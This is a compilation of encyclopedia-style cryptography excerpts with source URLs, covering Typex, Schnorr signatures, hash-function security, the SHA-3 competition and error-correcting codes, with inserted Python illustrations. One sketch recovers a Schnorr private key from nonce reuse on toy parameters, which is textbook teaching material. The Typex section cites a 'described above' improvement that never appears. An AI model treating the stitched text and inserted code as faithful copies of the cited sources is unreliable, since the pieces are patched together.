The following is a summary of information so far received on German attempts to break into the British Typex machine, based on P/W interrogations carried out during and subsequent to the war. It is divided into (a) the North African interrogations, (b) information gathered after the end of the war, and (c) an attempt to sum up the evidence for and against the possibility of German successes.
Apart from an unconfirmed report from an agent in France on 19 July 1942 to the effect that the GAF were using two British machines captured at DUNKIRK for passing their own traffic between BERLIN and GOLDAP, our evidence during the war was based on reports that OKH was exploiting Typex material left behind in TOBRUK in 1942.

Typex machines continued in use long after World War II. The New Zealand military used TypeX machines until the early 1970s, disposing of its last machine in about 1973.[8] All the versions of the Typex had advantages over the German military versions of the Enigma machine. The German equivalent teleprinter machines in World War II (used by higher-level, but not field, units) were the Lorenz SZ 40/42 and Siemens and Halske T52, using Fish cyphers.
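The multiple-notch improvement described above can be illustrated with a short simulation. The sketch below uses a deliberately simplified stepping model (no double-stepping or other mechanical quirks), and the notch positions are arbitrary stand-ins rather than real Typex drum layouts; it only shows why several unevenly spaced notches remove the regular carry pattern that a single-notch Enigma rotor produces.

```python
def carry_pattern(notch_positions, keypresses=60):
    """Step a fast rotor once per keypress and record the keypresses at
    which it carries (turns its neighbour). In this simplified model a
    carry occurs whenever the rotor sits at a notch position."""
    pos, carries = 0, []
    for t in range(1, keypresses + 1):
        if pos in notch_positions:
            carries.append(t)
        pos = (pos + 1) % 26
    return carries

single = carry_pattern({25})                       # Enigma-like single notch
multi = carry_pattern({2, 3, 8, 14, 17, 22, 25})   # a 7-notch casing, unevenly spaced
print("one notch:   ", single)   # carries arrive every 26 keypresses, regularly
print("seven notches:", multi)   # carries arrive often and at irregular intervals
```

The regular once-per-26 carry of the single-notch rotor is the kind of periodic structure a cryptanalyst can exploit; the seven-notch rotor steps its neighbour both more often and less predictably.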
https://en.wikipedia.org/wiki/Typex
In cryptography, a Schnorr signature is a digital signature produced by the Schnorr signature algorithm that was described by Claus Schnorr. It is a digital signature scheme known for its simplicity, among the first whose security is based on the intractability of certain discrete logarithm problems. It is efficient and generates short signatures.[1] It was covered by U.S. patent 4,995,082, which expired in February 2010. In the following, all operations take place in a group $G$ of prime order $q$ with generator $g$; $H$ is a cryptographic hash function, the signer's private key is $x$, and the corresponding public key is $y = g^{-x}$. To sign a message $M$: choose a random nonce $k$, compute $r = g^k$, $e = H(r \parallel M)$, and $s = k + xe \bmod q$. The signature is the pair $(s, e)$. Note that $s, e \in \mathbb{Z}/q\mathbb{Z}$; if $q < 2^{256}$, then the signature representation can fit into 64 bytes. To verify, compute $r_v = g^s y^e$ and $e_v = H(r_v \parallel M)$; if $e_v = e$, then the signature is verified. It is relatively easy to see that $e_v = e$ if the signed message equals the verified message: $r_v = g^s y^e = g^{k+xe} g^{-xe} = g^k = r$, and hence $e_v = H(r_v \parallel M) = H(r \parallel M) = e$. Public elements: $G$, $g$, $q$, $y$, $s$, $e$, $r$. Private elements: $k$, $x$. This shows only that a correctly signed message will verify correctly; many other properties are required for a secure signature algorithm. Just as with the closely related signature algorithms DSA, ECDSA, and ElGamal, reusing the secret nonce value $k$ on two Schnorr signatures of different messages will allow observers to recover the private key.[2] In the case of Schnorr signatures, this simply requires subtracting $s$ values: $s' - s = (k' - k) + x(e' - e)$. If $k' = k$ but $e' \neq e$, then $x$ can be simply isolated as $x = (s' - s)(e' - e)^{-1} \bmod q$. In fact, even slight biases in the value $k$, or partial leakage of $k$, can reveal the private key after collecting sufficiently many signatures and solving the hidden number problem.[2] The signature scheme was constructed by applying the Fiat–Shamir transformation[3] to Schnorr's identification protocol.[4][5] Therefore (as per Fiat and Shamir's arguments), it is secure if $H$ is modeled as a random oracle. Its security can also be argued in the generic group model, under the assumption that $H$ is "random-prefix preimage resistant" and "random-prefix second-preimage resistant".[6] In particular, $H$ does not need to be collision resistant. In 2012, Seurin[1] provided an exact proof of the Schnorr signature scheme. In particular, Seurin showed that the security proof using the forking lemma is the best possible result for any signature scheme based on one-way group homomorphisms, including Schnorr-type signatures and the Guillou–Quisquater signature schemes. Namely, under the ROMDL assumption, any algebraic reduction must lose a factor $f(\epsilon_F) q_h$ in its time-to-success ratio, where $f \leq 1$ is a function that remains close to 1 as long as "$\epsilon_F$ is noticeably smaller than 1", where $\epsilon_F$ is the probability of forgery when making at most $q_h$ queries to the random oracle. The aforementioned process achieves a $t$-bit security level with $4t$-bit signatures. For example, a 128-bit security level would require 512-bit (64-byte) signatures. The security is limited by discrete logarithm attacks on the group, which have a complexity of the square root of the group size.
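To make the scheme concrete, here is a minimal Python sketch over the order-$q$ subgroup of $\mathbb{Z}_p^*$, followed by the nonce-reuse key recovery just described. The parameters (a toy safe prime $p = 2q + 1$ with $q = 1019$, SHA-256 as $H$) and the function names are illustrative choices of mine, not standardized values; real deployments use much larger groups or elliptic curves.

```python
import hashlib
import secrets

q = 1019                 # toy prime group order
p = 2 * q + 1            # 2039, prime, so p = 2q + 1 is a safe prime
g = 4                    # 2^2 generates the order-q subgroup of squares mod p

def H(r, M):
    """Hash r || M down to an element of Z_q (SHA-256 as an example H)."""
    return int.from_bytes(hashlib.sha256(str(r).encode() + M).digest(), "big") % q

def keygen():
    x = secrets.randbelow(q - 1) + 1
    y = pow(g, -x, p)            # public key y = g^(-x) mod p
    return x, y

def sign(x, M, k=None):
    k = secrets.randbelow(q - 1) + 1 if k is None else k
    r = pow(g, k, p)
    e = H(r, M)
    s = (k + x * e) % q
    return s, e

def verify(y, M, s, e):
    r_v = pow(g, s, p) * pow(y, e, p) % p    # r_v = g^s * y^e = g^k
    return H(r_v, M) == e

x, y = keygen()
s1, e1 = sign(x, b"message one")
assert verify(y, b"message one", s1, e1)

# Nonce reuse: two signatures with the same k on different messages leak x
# via x = (s' - s) * (e' - e)^(-1) mod q (the e values differ here with
# overwhelming probability).
k = 123
s_a, e_a = sign(x, b"alpha", k)
s_b, e_b = sign(x, b"beta", k)
x_recovered = (s_b - s_a) * pow(e_b - e_a, -1, q) % q
print("recovered private key:", x_recovered == x)   # True
```

The recovery step is exactly the subtraction described above: with $k$ fixed, $s' - s = x(e' - e)$, so a single modular inversion exposes the private key.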
In Schnorr's original 1991 paper, it was suggested that, since collision resistance in the hash is not required, shorter hash functions may be just as secure, and indeed recent developments suggest that a $t$-bit security level can be achieved with $3t$-bit signatures.[6] Then a 128-bit security level would require only 384-bit (48-byte) signatures, and this could be achieved by truncating the size of $e$ until it is half the length of the $s$ bitfield. The Schnorr signature is used by numerous products. A notable usage is the deterministic Schnorr signature using the secp256k1 elliptic curve for Bitcoin transaction signatures after the Taproot update.[7]
https://en.wikipedia.org/wiki/Schnorr_signature
In cryptography, the Pointcheval–Stern signature algorithm is a digital signature scheme based on the closely related ElGamal signature scheme. It changes the ElGamal scheme slightly to produce an algorithm which has been proven secure in a strong sense against adaptive chosen-message attacks, assuming the discrete logarithm problem is intractable in a strong sense.[1][2] David Pointcheval and Jacques Stern developed the forking lemma technique in constructing their proof for this algorithm. It has been used in other security investigations of various cryptographic algorithms.
https://en.wikipedia.org/wiki/Pointcheval%E2%80%93Stern_signature_algorithm
In cryptography, puzzle friendliness is a property of cryptographic hash functions. Not all cryptographic hash functions have this property. SHA-256 is a cryptographic hash function that has this property. Informally, a hash function is puzzle friendly if no solving strategy is better than making random guesses; the only way to find a solution is the brute-force method. Although the property is very general, it is of particular importance to proof-of-work schemes, such as in Bitcoin mining.[1] Formally, a hash function H is said to be puzzle friendly if, for every possible n-bit output value y, if k is chosen from a distribution with high min-entropy, then it is infeasible to find x such that H(k || x) = y in time significantly less than 2^n.[2][1] In the above definition, high min-entropy means that the distribution from which k is chosen is spread out so widely that the probability of any particular value being chosen is negligible. Let H be a cryptographic hash function and let an output y be given. Let it be required to find z such that H(z) = y. Let us also assume that a part of the string z, say k, is known. Then the problem of determining z boils down to finding the x that should be concatenated with k to get z. The problem of determining x can be thought of as a puzzle. It is really a puzzle only if the task of finding x is nontrivial and nearly infeasible. Thus the puzzle-friendliness property of a cryptographic hash function makes the problem of finding x closer to being a real puzzle. The puzzle-friendliness property of cryptographic hash functions is used in Bitcoin mining.
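The connection to proof-of-work can be made concrete with a small sketch. The toy puzzle below picks a random high-min-entropy prefix k and searches for an x such that SHA-256(k || x) falls below a target; because SHA-256 is believed to be puzzle friendly, nothing beats enumerating candidates. The target and encoding are invented for illustration; Bitcoin's actual puzzle hashes a block header with a double SHA-256 against a consensus difficulty target.

```python
import hashlib
import itertools
import os

k = os.urandom(16)        # the random, high-min-entropy part of the input
target = 2 ** 236         # toy difficulty: roughly 20 leading zero bits

# Brute-force search: try x = 0, 1, 2, ... until the hash is below the target.
for counter in itertools.count():
    x = counter.to_bytes(8, "big")
    digest = hashlib.sha256(k + x).digest()
    if int.from_bytes(digest, "big") < target:
        print(f"solved after {counter + 1} guesses: x = {x.hex()}")
        break
```

With this target a solution needs about a million guesses on average; halving the target doubles the expected work, which is exactly the tunable-cost behaviour that mining relies on.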
https://en.wikipedia.org/wiki/Puzzle_friendliness
The NIST hash function competition was an open competition held by the US National Institute of Standards and Technology (NIST) to develop a new hash function called SHA-3 to complement the older SHA-1 and SHA-2. The competition was formally announced in the Federal Register on November 2, 2007.[1] "NIST is initiating an effort to develop one or more additional hash algorithms through a public competition, similar to the development process for the Advanced Encryption Standard (AES)."[2] The competition ended on October 2, 2012, when NIST announced that Keccak would be the new SHA-3 hash algorithm.[3]

The winning hash function has been published as NIST FIPS 202, the "SHA-3 Standard", to complement FIPS 180-4, the Secure Hash Standard. The NIST competition has inspired other competitions, such as the Password Hashing Competition.

Submissions were due October 31, 2008, and the list of candidates accepted for the first round was published on December 9, 2008.[4] NIST held a conference in late February 2009 where submitters presented their algorithms and NIST officials discussed criteria for narrowing down the field of candidates for Round 2.[5] The list of 14 candidates accepted to Round 2 was published on July 24, 2009.[6] Another conference was held on August 23–24, 2010 (after CRYPTO 2010) at the University of California, Santa Barbara, where the second-round candidates were discussed.[7] The announcement of the final-round candidates occurred on December 10, 2010.[8] On October 2, 2012, NIST announced its winner, choosing Keccak, created by Guido Bertoni, Joan Daemen, and Gilles Van Assche of STMicroelectronics and Michaël Peeters of NXP.[3]

This is an incomplete list of known submissions. NIST selected 51 entries for round 1.[4] 14 of them advanced to round 2,[6] from which 5 finalists were selected. The winner was announced to be Keccak on October 2, 2012.[9]

NIST selected five SHA-3 candidate algorithms to advance to the third (and final) round: BLAKE, Grøstl, JH, Keccak, and Skein.[10] NIST noted some factors that figured into its selection as it announced the finalists,[11] and has released a report explaining its evaluation algorithm by algorithm.[12][13][14]

The following hash function submissions were accepted for round two but did not make it to the final round. As noted in the announcement of the finalists, "none of these candidates was clearly broken". The following hash function submissions were accepted for round one but did not pass to round two. They have neither been conceded by the submitters nor had substantial cryptographic weaknesses announced. However, most of them have some weaknesses in the design components, or performance issues. The following non-conceded round-one entrants have had substantial cryptographic weaknesses announced. The following round-one entrants have been officially retracted from the competition by their submitters; they are considered broken according to the NIST official round-one candidates web site,[54] and as such are withdrawn from the competition.

Several submissions received by NIST were not accepted as first-round candidates, following an internal review by NIST.[4] In general, NIST gave no details as to why each was rejected. NIST also has not given a comprehensive list of rejected algorithms; there are known to be 13,[4][68] but only a few are public.
https://en.wikipedia.org/wiki/NIST_hash_function_competition
In cryptography, cryptographic hash functions can be divided into two main categories. In the first category are those functions whose designs are based on mathematical problems, and whose security thus follows from rigorous mathematical proofs, complexity theory and formal reduction. These functions are called provably secure cryptographic hash functions. Constructing them is very difficult, and few examples have been introduced; their practical use is limited. In the second category are functions which are not based on mathematical problems, but on ad hoc constructions in which the bits of the message are mixed to produce the hash. These are then believed to be hard to break, but no formal proof is given. Almost all hash functions in widespread use reside in this category. Some of these functions are already broken and are no longer in use. See Hash function security summary.

Generally, the basic security of cryptographic hash functions can be seen from different angles: pre-image resistance, second pre-image resistance, collision resistance, and pseudo-randomness. The basic question is the meaning of hard. There are two approaches to answering this question. First is the intuitive/practical approach: "hard means that it is almost certainly beyond the reach of any adversary who must be prevented from breaking the system for as long as the security of the system is deemed important." The second approach is theoretical and is based on computational complexity theory: if problem A is hard, then there exists a formal security reduction from a problem which is widely considered unsolvable in polynomial time, such as integer factorization or the discrete logarithm problem.

However, non-existence of a polynomial-time algorithm does not automatically ensure that the system is secure. The difficulty of a problem also depends on its size. For example, RSA public-key cryptography (which relies on the difficulty of integer factorization) is considered secure only with keys that are at least 2048 bits long, whereas keys for the ElGamal cryptosystem (which relies on the difficulty of the discrete logarithm problem) are commonly in the range of 256–512 bits.

If the set of inputs to the hash is relatively small or is ordered by likelihood in some way, then a brute-force search may be practical, regardless of theoretical security. The likelihood of recovering the preimage depends on the input set size and the speed or cost of computing the hash function. A common example is the use of hashes to store password validation data. Rather than store the plaintext of user passwords, an access control system typically stores a hash of the password. When a person requests access, the password they submit is hashed and compared with the stored value. If the stored validation data is stolen, then the thief will only have the hash values, not the passwords. However, most users choose passwords in predictable ways, and passwords are often short enough that all possible combinations can be tested if fast hashes are used.[1] Special hashes called key derivation functions have been created to slow such searches. See Password cracking.

Most hash functions are built on an ad hoc basis, where the bits of the message are thoroughly mixed to produce the hash. Various bitwise operations (e.g. rotations), modular additions, and compression functions are used in iterative mode to ensure high complexity and pseudo-randomness of the output. In this way, the security is very hard to prove, and the proof is usually not done.
Some years ago, one of the most popular hash functions, SHA-1, was shown to be less secure than its length suggested: collisions could be found in only 2^51[2] tests, rather than the brute-force number of 2^80. In other words, most of the hash functions in use nowadays are not provably collision-resistant. These hashes are not based on purely mathematical functions. This approach generally yields more efficient hash functions, but with the risk that a weakness in such a function will eventually be used to find collisions. One famous case is MD5.

In the provable approach, the security of a hash function is based on some hard mathematical problem, and it is proved that finding collisions of the hash function is as hard as breaking the underlying problem. This gives a somewhat stronger notion of security than just relying on complex mixing of bits as in the classical approach. A cryptographic hash function has provable security against collision attacks if finding collisions is provably polynomial-time reducible from a problem P which is supposed to be unsolvable in polynomial time. The function is then called provably secure, or just provable. It means that if finding collisions were feasible in polynomial time by algorithm A, then one could find and use a polynomial-time algorithm R (a reduction algorithm) that would use algorithm A to solve problem P, which is widely supposed to be unsolvable in polynomial time. That is a contradiction, so finding collisions cannot be easier than solving P. However, this only indicates that finding collisions is difficult in some cases, as not all instances of a computationally hard problem are typically hard. Indeed, very large instances of NP-hard problems are routinely solved, while only the hardest are practically impossible to solve. Examples of problems that are assumed to be unsolvable in polynomial time include integer factorization and the discrete logarithm problem.

SWIFFT is an example of a hash function that circumvents these security problems. It can be shown that, for any algorithm that can break SWIFFT with probability p within an estimated time t, one can find an algorithm that solves the worst-case scenario of a certain difficult mathematical problem within a time t′ depending on t and p.

As a toy example of the provable approach, let hash(m) = x^m mod n, where n is a hard-to-factor composite number and x is some prespecified base value. A collision x^(m1) ≡ x^(m2) (mod n) reveals a multiple m1 − m2 of the multiplicative order of x modulo n. This information can be used to factor n in polynomial time, assuming certain properties of x. But the algorithm is quite inefficient because it requires on average 1.5 multiplications modulo n per message bit.
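A sketch of the modular-exponentiation hash just described, hash(m) = x^m mod n. The tiny modulus below is trivially factorable and serves only to show the mechanics; a real instantiation would need a large modulus of secret factorization.

```python
# Toy parameters: in practice n must be a large RSA-style modulus whose
# factorization is kept secret, and x a suitable prespecified base.
n = 61 * 53   # trivially factorable; illustration only
x = 7

def mod_exp_hash(message: bytes) -> int:
    m = int.from_bytes(message, "big")   # interpret the message as a big integer
    return pow(x, m, n)                  # one modular exponentiation over the whole message

print(mod_exp_hash(b"hi"))
```

The quoted inefficiency is visible here: the exponentiation performs on the order of one modular multiplication (plus squarings) per bit of m, which is why such provable hashes see little practical use.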
https://en.wikipedia.org/wiki/Provably_secure_cryptographic_hash_function
In information theory and coding theory with applications in computer science and telecommunications, error detection and correction (EDAC) or error control are techniques that enable reliable delivery of digital data over unreliable communication channels. Many communication channels are subject to channel noise, and thus errors may be introduced during transmission from the source to a receiver. Error detection techniques allow detecting such errors, while error correction enables reconstruction of the original data in many cases. Error detection is the detection of errors caused by noise or other impairments during transmission from the transmitter to the receiver. Error correction is the detection of errors and reconstruction of the original, error-free data.

In classical antiquity, copyists of the Hebrew Bible were paid for their work according to the number of stichs (lines of verse). As the prose books of the Bible were hardly ever written in stichs, the copyists, in order to estimate the amount of work, had to count the letters.[1] This also helped ensure accuracy in the transmission of the text with the production of subsequent copies.[2][3] Between the 7th and 10th centuries CE, a group of Jewish scribes formalized and expanded this to create the Numerical Masorah to ensure accurate reproduction of the sacred text. It included counts of the number of words in a line, section, book and groups of books, noting the middle stich of a book, word use statistics, and commentary.[1] Standards became such that a deviation in even a single letter in a Torah scroll was considered unacceptable.[4] The effectiveness of their error correction method was verified by the accuracy of copying through the centuries, demonstrated by the discovery of the Dead Sea Scrolls in 1947–1956, dating from c. 150 BCE – 75 CE.[5]

The modern development of error correction codes is credited to Richard Hamming in 1947.[6] A description of Hamming's code appeared in Claude Shannon's A Mathematical Theory of Communication[7] and was quickly generalized by Marcel J. E. Golay.[8]

All error-detection and correction schemes add some redundancy (i.e., some extra data) to a message, which receivers can use to check consistency of the delivered message and to recover data that has been determined to be corrupted. Error detection and correction schemes can be either systematic or non-systematic. In a systematic scheme, the transmitter sends the original (error-free) data and attaches a fixed number of check bits (or parity data), which are derived from the data bits by some encoding algorithm. If error detection is required, a receiver can simply apply the same algorithm to the received data bits and compare its output with the received check bits; if the values do not match, an error has occurred at some point during the transmission. If error correction is required, a receiver can apply the decoding algorithm to the received data bits and the received check bits to recover the original error-free data. In a system that uses a non-systematic code, the original message is transformed into an encoded message carrying the same information and that has at least as many bits as the original message.

Good error control performance requires the scheme to be selected based on the characteristics of the communication channel. Common channel models include memoryless models, where errors occur randomly and with a certain probability, and dynamic models, where errors occur primarily in bursts.
Consequently, error-detecting and -correcting codes can be generally distinguished between random-error-detecting/correcting and burst-error-detecting/correcting. Some codes can also be suitable for a mixture of random errors and burst errors.

If the channel characteristics cannot be determined, or are highly variable, an error-detection scheme may be combined with a system for retransmissions of erroneous data. This is known as automatic repeat request (ARQ), and is most notably used in the Internet. An alternate approach for error control is hybrid automatic repeat request (HARQ), which is a combination of ARQ and error-correction coding. There are three major types of error correction: automatic repeat request, forward error correction, and hybrid schemes combining the two.[9]

Automatic repeat request (ARQ) is an error control method for data transmission that makes use of error-detection codes, acknowledgment and/or negative acknowledgment messages, and timeouts to achieve reliable data transmission. An acknowledgment is a message sent by the receiver to indicate that it has correctly received a data frame. Usually, when the transmitter does not receive the acknowledgment before the timeout occurs (i.e., within a reasonable amount of time after sending the data frame), it retransmits the frame until it is either correctly received or the error persists beyond a predetermined number of retransmissions. Three types of ARQ protocols are Stop-and-wait ARQ, Go-Back-N ARQ, and Selective Repeat ARQ. ARQ is appropriate if the communication channel has varying or unknown capacity, such as is the case on the Internet. However, ARQ requires the availability of a back channel, results in possibly increased latency due to retransmissions, and requires the maintenance of buffers and timers for retransmissions, which in the case of network congestion can put a strain on the server and overall network capacity.[10] For example, ARQ is used on shortwave radio data links in the form of ARQ-E, or combined with multiplexing as ARQ-M.

Forward error correction (FEC) is a process of adding redundant data such as an error-correcting code (ECC) to a message so that it can be recovered by a receiver even when a number of errors (up to the capability of the code being used) are introduced, either during the process of transmission or on storage. Since the receiver does not have to ask the sender for retransmission of the data, a backchannel is not required in forward error correction. Error-correcting codes are used in lower-layer communication such as cellular networks, high-speed fiber-optic communication and Wi-Fi,[11][12] as well as for reliable storage in media such as flash memory, hard disks and RAM.[13] Error-correcting codes are usually distinguished between convolutional codes and block codes; a sketch of one classic block code follows this passage.

Shannon's theorem is an important theorem in forward error correction, and describes the maximum information rate at which reliable communication is possible over a channel that has a certain error probability or signal-to-noise ratio (SNR). This strict upper limit is expressed in terms of the channel capacity. More specifically, the theorem says that there exist codes such that, with increasing encoding length, the probability of error on a discrete memoryless channel can be made arbitrarily small, provided that the code rate is smaller than the channel capacity. The code rate is defined as the fraction k/n of k source symbols and n encoded symbols. The actual maximum code rate allowed depends on the error-correcting code used, and may be lower.
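As the block-code sketch promised above, here is a minimal Hamming(7,4) encoder/decoder in Python, a classic single-error-correcting block code; the bit layout and function names follow one common textbook convention, not a fixed standard.

```python
# Hamming(7,4): 4 data bits protected by 3 parity bits, correcting any
# single flipped bit in the 7-bit codeword.

def encode(d):          # d = [d1, d2, d3, d4]
    d1, d2, d3, d4 = d
    p1 = d1 ^ d2 ^ d4
    p2 = d1 ^ d3 ^ d4
    p3 = d2 ^ d3 ^ d4
    return [p1, p2, d1, p3, d2, d3, d4]   # codeword positions 1..7

def decode(c):          # c = 7-bit codeword, possibly with one flipped bit
    s1 = c[0] ^ c[2] ^ c[4] ^ c[6]        # checks positions 1, 3, 5, 7
    s2 = c[1] ^ c[2] ^ c[5] ^ c[6]        # checks positions 2, 3, 6, 7
    s3 = c[3] ^ c[4] ^ c[5] ^ c[6]        # checks positions 4, 5, 6, 7
    pos = s1 + 2 * s2 + 4 * s3            # syndrome = 1-based error position (0 = no error)
    if pos:
        c = c.copy()
        c[pos - 1] ^= 1                   # correct the single-bit error
    return [c[2], c[4], c[5], c[6]]       # recover d1..d4

word = [1, 0, 1, 1]
sent = encode(word)
received = sent.copy()
received[5] ^= 1                          # channel flips one bit
assert decode(received) == word
```

The syndrome (s1, s2, s3) reads off the 1-based position of a single flipped bit directly, which is the defining trick of Hamming codes.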
This is because Shannon's proof was only of existential nature, and did not show how to construct codes that are both optimal and have efficient encoding and decoding algorithms.

Hybrid ARQ is a combination of ARQ and forward error correction. There are two basic approaches:[10] either messages are always transmitted with FEC parity data in addition to error-detection redundancy, or messages are transmitted without parity data and the FEC information is sent only when a receiver detects an error and requests a retransmission. The latter approach is particularly attractive on an erasure channel when using a rateless erasure code.

Error detection is most commonly realized using a suitable hash function (or specifically, a checksum, cyclic redundancy check or other algorithm). A hash function adds a fixed-length tag to a message, which enables receivers to verify the delivered message by recomputing the tag and comparing it with the one provided. There exists a vast variety of different hash function designs. However, some are of particularly widespread use because of either their simplicity or their suitability for detecting certain kinds of errors (e.g., the cyclic redundancy check's performance in detecting burst errors). A random-error-correcting code based on minimum distance coding can provide a strict guarantee on the number of detectable errors, but it may not protect against a preimage attack.

A repetition code is a coding scheme that repeats the bits across a channel to achieve error-free communication. Given a stream of data to be transmitted, the data are divided into blocks of bits. Each block is transmitted some predetermined number of times. For example, to send the bit pattern 1011, the four-bit block can be repeated three times, thus producing 1011 1011 1011. If this twelve-bit pattern was received as 1010 1011 1011 – where the first block is unlike the other two – an error has occurred. A repetition code is very inefficient and can be susceptible to problems if the error occurs in exactly the same place for each group (e.g., 1010 1010 1010 in the previous example would be detected as correct). The advantage of repetition codes is that they are extremely simple, and they are in fact used in some transmissions of numbers stations.[14][15]

A parity bit is a bit that is added to a group of source bits to ensure that the number of set bits (i.e., bits with value 1) in the outcome is even or odd. It is a very simple scheme that can be used to detect a single error or any other odd number (i.e., three, five, etc.) of errors in the output. An even number of flipped bits will make the parity bit appear correct even though the data is erroneous. Parity bits added to each word sent are called transverse redundancy checks, while those added at the end of a stream of words are called longitudinal redundancy checks. For example, if each of a series of m-bit words has a parity bit added, showing whether there were an odd or even number of ones in that word, any word with a single error in it will be detected. It will not be known where in the word the error is, however. If, in addition, after each stream of n words a parity sum is sent, each bit of which shows whether there were an odd or even number of ones at that bit position in the most recent group, the exact position of the error can be determined and the error corrected; a sketch of this two-dimensional scheme follows below. This method is only guaranteed to be effective, however, if there is no more than one error in every group of n words. With more error correction bits, more errors can be detected and in some cases corrected. There are also other bit-grouping techniques.

A checksum of a message is a modular arithmetic sum of message code words of a fixed word length (e.g., byte values).
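Here is the small Python sketch of the transverse-plus-longitudinal parity scheme described above; the row/column layout and names are invented for the example.

```python
# Two-dimensional parity: one parity bit per word (transverse) plus a
# final parity word over all bit positions (longitudinal). Together
# they locate, and hence correct, a single flipped bit.

def row_parity(word):
    return sum(word) % 2

def column_parity(words):
    return [sum(col) % 2 for col in zip(*words)]

words = [[1, 0, 1, 1],
         [0, 1, 1, 0],
         [1, 1, 0, 0]]
sent_rows = [row_parity(w) for w in words]    # transverse checks
sent_cols = column_parity(words)              # longitudinal checks

words[1][2] ^= 1                              # a single bit flips in transit

# The failing row check gives the word, the failing column check the bit.
bad_row = next(i for i, w in enumerate(words) if row_parity(w) != sent_rows[i])
bad_col = next(j for j, p in enumerate(column_parity(words)) if p != sent_cols[j])
words[bad_row][bad_col] ^= 1                  # correct the located bit
assert column_parity(words) == sent_cols
```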
The sum may be negated by means of a ones'-complement operation prior to transmission to detect unintentional all-zero messages. Checksum schemes include parity bits, check digits, and longitudinal redundancy checks. Some checksum schemes, such as the Damm algorithm, the Luhn algorithm, and the Verhoeff algorithm, are specifically designed to detect errors commonly introduced by humans in writing down or remembering identification numbers.

A cyclic redundancy check (CRC) is a non-secure hash function designed to detect accidental changes to digital data in computer networks. It is not suitable for detecting maliciously introduced errors. It is characterized by specification of a generator polynomial, which is used as the divisor in a polynomial long division over a finite field, taking the input data as the dividend. The remainder becomes the result. A CRC has properties that make it well suited for detecting burst errors. CRCs are particularly easy to implement in hardware and are therefore commonly used in computer networks and storage devices such as hard disk drives. The parity bit can be seen as a special-case 1-bit CRC. A sketch of the bit-by-bit division appears after this passage.

The output of a cryptographic hash function, also known as a message digest, can provide strong assurances about data integrity, whether changes of the data are accidental (e.g., due to transmission errors) or maliciously introduced. Any modification to the data will likely be detected through a mismatching hash value. Furthermore, given some hash value, it is typically infeasible to find some input data (other than the one given) that will yield the same hash value. If an attacker can change not only the message but also the hash value, then a keyed hash or message authentication code (MAC) can be used for additional security. Without knowing the key, it is not possible for the attacker to easily or conveniently calculate the correct keyed hash value for a modified message.

Digital signatures can provide strong assurances about data integrity, whether the changes of the data are accidental or maliciously introduced. Digital signatures are perhaps most notable for being part of the HTTPS protocol for securely browsing the web.

Any error-correcting code can be used for error detection. A code with minimum Hamming distance d can detect up to d − 1 errors in a code word. Using minimum-distance-based error-correcting codes for error detection can be suitable if a strict limit on the minimum number of errors to be detected is desired. Codes with minimum Hamming distance d = 2 are degenerate cases of error-correcting codes and can be used to detect single errors. The parity bit is an example of a single-error-detecting code.

Applications that require low latency (such as telephone conversations) cannot use automatic repeat request (ARQ); they must use forward error correction (FEC). By the time an ARQ system discovers an error and retransmits it, the re-sent data will arrive too late to be usable. Applications where the transmitter immediately forgets the information as soon as it is sent (such as most television cameras) cannot use ARQ; they must use FEC because when an error occurs, the original data is no longer available. Applications that use ARQ must have a return channel; applications having no return channel cannot use ARQ. Applications that require extremely low error rates (such as digital money transfers) must use ARQ due to the possibility of uncorrectable errors with FEC.
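The CRC sketch promised above: polynomial long division over GF(2), implemented bit by bit. The 8-bit generator 0x07 (x^8 + x^2 + x + 1) is one commonly used polynomial and is an assumption of this sketch; real deployments more often use 16- or 32-bit CRCs.

```python
def crc8(data: bytes, poly: int = 0x07) -> int:
    """Bit-by-bit CRC: divide the message by the generator polynomial
    over GF(2) and return the 8-bit remainder."""
    crc = 0
    for byte in data:
        crc ^= byte                          # bring in the next 8 message bits
        for _ in range(8):
            if crc & 0x80:                   # top bit set: subtract (XOR) the generator
                crc = ((crc << 1) ^ poly) & 0xFF
            else:
                crc = (crc << 1) & 0xFF
    return crc                               # the remainder is the check value

msg = b"hello"
check = crc8(msg)
assert crc8(msg) == check
assert crc8(b"hellp") != check               # a burst error within 8 bits is always detected
```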
Reliability and inspection engineering also make use of the theory of error-correcting codes,[16] as does natural language.[17] In a typical TCP/IP stack, error control is performed at multiple levels.

The development of error-correction codes was tightly coupled with the history of deep-space missions due to the extreme dilution of signal power over interplanetary distances, and the limited power availability aboard space probes. Whereas early missions sent their data uncoded, starting in 1968, digital error correction was implemented in the form of (sub-optimally decoded) convolutional codes and Reed–Muller codes.[18] The Reed–Muller code was well suited to the noise the spacecraft was subject to (approximately matching a bell curve), and was implemented for the Mariner spacecraft and used on missions between 1969 and 1977. The Voyager 1 and Voyager 2 missions, which started in 1977, were designed to deliver color imaging and scientific information from Jupiter and Saturn.[19] This resulted in increased coding requirements, and thus the spacecraft were supported by (optimally Viterbi-decoded) convolutional codes that could be concatenated with an outer Golay (24,12,8) code. The Voyager 2 craft additionally supported an implementation of a Reed–Solomon code. The concatenated Reed–Solomon–Viterbi (RSV) code allowed for very powerful error correction, and enabled the spacecraft's extended journey to Uranus and Neptune. After ECC system upgrades in 1989, both spacecraft used V2 RSV coding. The Consultative Committee for Space Data Systems currently recommends usage of error correction codes with performance similar to the Voyager 2 RSV code as a minimum. Concatenated codes are increasingly falling out of favor with space missions, and are replaced by more powerful codes such as Turbo codes or LDPC codes. The different kinds of deep-space and orbital missions that are conducted suggest that trying to find a one-size-fits-all error correction system will be an ongoing problem. For missions close to Earth, the nature of the noise in the communication channel is different from that which a spacecraft on an interplanetary mission experiences. Additionally, as a spacecraft increases its distance from Earth, the problem of correcting for noise becomes more difficult.

The demand for satellite transponder bandwidth continues to grow, fueled by the desire to deliver television (including new channels and high-definition television) and IP data. Transponder availability and bandwidth constraints have limited this growth. Transponder capacity is determined by the selected modulation scheme and the proportion of capacity consumed by FEC.

Error detection and correction codes are often used to improve the reliability of data storage media.[20] A parity track capable of detecting single-bit errors was present on the first magnetic tape data storage in 1951. The optimal rectangular code used in group coded recording tapes not only detects but also corrects single-bit errors. Some file formats, particularly archive formats, include a checksum (most often CRC32) to detect corruption and truncation, and can employ redundancy or parity files to recover portions of corrupted data. Reed–Solomon codes are used in compact discs to correct errors caused by scratches. Modern hard drives use Reed–Solomon codes to detect and correct minor errors in sector reads, and to recover corrupted data from failing sectors and store that data in the spare sectors.[21] RAID systems use a variety of error correction techniques to recover data when a hard drive completely fails.
